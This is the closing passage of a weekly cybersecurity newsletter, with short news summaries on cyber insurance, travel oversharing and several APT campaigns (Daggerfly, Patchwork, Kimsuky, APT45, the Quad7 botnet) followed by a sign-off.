Cyber insurance is evolving to improve organizational cybersecurity postures. Despite its benefits, only a quarter of companies have standalone policies due to cost and coverage concerns. Cyber insurance now includes AI-related risks and personal insurance for smart devices. Organizations should align cyber insurance with security policies and consider it as part of a broader risk mitigation strategy.
Social Media and Travel: Be Careful of What You Share [49]
Oversharing travel details on social media can alert criminals to your absence, increasing burglary risks. Users should schedule content, use privacy settings, disable geo-tagging, and limit audience visibility to enhance security while traveling.
Advanced Persistent Threats (APT)
Finally, we focus on Advanced Persistent Threats (APTs). These are long-term, sneaky cyber-attacks that need a deep understanding to stop. Learn how to protect yourself from these persistent threats.
Espionage Group Daggerfly Revamps Toolset, Expands Targets in Wake of Malware Exposure [50]
The espionage group Daggerfly, also known as Evasive Panda, has updated its cyber arsenal, including a new malware family based on the MgBot modular framework and a new version of the Macma macOS backdoor. These updates are likely in response to the public disclosure of older variants. The group targets organizations in Taiwan and a U.S. NGO based in China. Daggerfly’s tools include the Macma backdoor and a new Windows backdoor, Trojan.Suzafk.
Patchwork Group Expands Cyber Espionage with Advanced Tools [51]
The Patchwork group, targeting Bhutan, used updated backdoor PGoShell and new tool Brute Ratel C4. The attack involved distributing a decoy file and downloading malicious components. The group targets governmental and defense organizations in East and South Asia. Patchwork’s tools include Brute Ratel C4 for managing file systems, port scanning, and capturing screens, and PGoShell with remote control and screen capture capabilities.
Kimsuky APT: New TTPs Revealed in Rapid7 Cybersecurity Report [52]
Rapid7’s report reveals Kimsuky APT’s advanced tactics, using phishing and social engineering to target government and research sectors. Key methods include LNK and CHM files for payloads. Organizations should enhance email security and train staff on social engineering defenses.
North Korean APT45 Hackers, Long Running Digital Military Since 2009 [53]
The FBI and Mandiant have identified North Korean hacking group APT45, active since 2009, targeting U.S. government agencies and critical infrastructure, supporting North Korea's military and nuclear programs through espionage and ransomware attacks.
Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking [54]
A Chinese cybercrime network involved in gambling and human trafficking uses advanced DNS and traffic systems. Organizations should boost DNS security, monitor for suspicious activities, and work with law enforcement. Implementing multi-layered security and educating employees on cyber threats are crucial to combating these complex operations.
Researchers Uncover Massive Quad7 Botnet Targeting Microsoft 365 [55]
Sekoia.io and Intrinsec have analyzed the Quad7 botnet, which targets Microsoft 365 accounts using TCP port 7777 on infected routers. The botnet's number of unique IP addresses has decreased, but it continues to evolve, mainly targeting TP-Link routers. The botnet uses password spraying attacks on Microsoft 365 accounts, and researchers urge companies to help solve remaining mysteries related to the botnet.
That’s it for this week! We've covered the latest vulnerabilities, exploits, data breaches, malware, ransomware, APTs, and some practical cybersecurity tips. Stay informed and keep your systems secure.
Have any questions, comments, or feedback? Feel free to reply directly, I'd love to hear from you!
If you find this newsletter helpful and think others would too, please consider forwarding it to them. 🙏
Thanks for reading!
exit(0);
@in/kurozy